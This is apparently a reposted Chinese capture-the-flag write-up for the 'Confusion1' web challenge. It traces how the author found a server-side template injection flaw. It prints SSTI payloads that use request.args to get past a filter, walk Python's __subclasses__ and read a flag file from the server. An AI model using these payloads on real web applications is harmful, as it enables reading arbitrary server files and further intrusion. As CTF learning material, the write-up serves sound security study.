攻防世界 Confusion1
本文共 638 字,大约阅读时间需要 2 分钟。
- 进入页面
- index.php页面查看了源码,没有什么发现
- 进入Login.php页面 返回404???
- 查看一下源码
- 从这里看可能是个SSTI模板注入
- 这里推荐个初学者的SSTI文章 y
- 确定是SSTI模板注入
- 按照正常的注入流程
{ {''.__class__.__mro__}} - 页面返回的是 从这里来看应该是存在一个过滤
- 想到做过的SSTI题目的绕过方式 shrine用的是
url_for函数 尝试一下 { {url_for.__globals__}}
{ {get_flashed_messages.__globals__}}结局一样 得得得!!! 又是没涉及到的新知识- 明天整理一下SSTI学过的知识 现在去看wp了
- wp涉及到了一个新的绕过姿势request.args
- 第一步:
{ {''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__ - 有file类 可以读取
- 第二步:
{ {''[request.args.a][request.args.b][2][request.args.c]()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt")[request.args.d]}}?a=__class__&b=__mro__&c=__subclasses__&d=read()
转载地址:http://xywmf.baihongyu.com/
你可能感兴趣的文章
不对全文内容进行索引的 Loki 到底优秀在哪里
查看>>
太强大了!这些 Go 的难点问题都能解决!
查看>>
万字长文:K8s 创建 pod 时,背后到底发生了什么?
查看>>
后云原生时代,Kubernetes:你看我还有机会吗?
查看>>
Wintun:一款惊艳的 WireGuard 虚拟网卡接口驱动
查看>>
个人学习方法分享
查看>>
时隔多年。。终于有一款云原生消息系统出仕了!
查看>>
[译]数据包在 Kubernetes 中的一生(1)
查看>>
[译]数据包在 Kubernetes 中的一生(2)
查看>>
[译]数据包在 Kubernetes 中的一生(3)
查看>>
从源头解决 Service Mesh 问题最彻底!
查看>>
一次“不负责任”的 K8s 网络故障排查经验分享
查看>>
一次有趣的 Docker 网络问题排查经历
查看>>
KubeSphere Meetup 北京站火热报名中 | 搭载 CIC 2021 云计算峰会
查看>>
深入理解 Linux Cgroup 系列(一):基本概念
查看>>
深入理解 Linux Cgroup 系列(二):玩转 CPU
查看>>
云原生周报第 1 期 | 2019-06-24~2019-06-28
查看>>
Kubernetes Pod 驱逐详解
查看>>
kubectl 创建 Pod 背后到底发生了什么?
查看>>
[译] Kubernetes 儿童插图指南
查看>>